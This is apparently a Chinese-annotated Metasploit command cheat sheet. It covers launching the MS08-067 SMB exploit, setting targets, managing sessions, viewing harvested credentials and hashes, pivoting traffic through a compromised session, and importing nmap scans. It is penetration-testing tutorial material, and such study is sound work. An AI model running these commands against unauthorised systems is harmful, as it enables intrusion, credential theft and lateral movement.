root@kali:~# msfupdate 升级msf
root@kali:~# msfdb reinit 重新初始化数据库
root@kali:~# update-rc.d postgresql enable 使postgresql数据库开机自启
msf > search name:smb cve:2015
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info 查看漏洞的详细信息
msf exploit(ms08_067_netapi) > show missing 查看未指定的必须项
msf exploit(ms08_067_netapi) > check 验证目标系统是否存在漏洞
msf > hosts -c address,name,os_name -S xp
msf > hosts -d
msf > services -p 80
creds 查看扫描出来的密码信息
vulns 查看扫面出来的漏洞信息
loot 查看hash值
msf exploit(ms08_067_netapi) > set rhost 192.168.80.150
msf exploit(ms08_067_netapi) > unset RHOST
msf > setg rhost 192.168.80.150
msf > unsetg rhost
msf exploit(ms08_067_netapi) > save
root@kali:~# rm /root/.msf4/config
msf exploit(ms08_067_netapi) > exploit -j 后台运行
msf > sessions
msf > sessions -i 3
msf > load nessus 加载nessus插件
msf > unload nessus
msf > route add 210.45.128.0 255.255.255.0 3 朝向210.45.128.0/24的流量通过session3进行流量转发
root@kali:~# vim 08-067.rc 编辑ms08-067的攻击过程
msf > resource 08-067.rc 通过resource命令直接调用,或者:
root@kali:~# msfconsole -r 08-067.rc
将nmap的扫描结果导入msf
root@kali:~# nmap -Pn -sV -oX dmz 192.168.80.0/24 使用-oX参数将扫描结果导出为dmz文件
msf > db_import /root/dmz 导入扫描结果
网友评论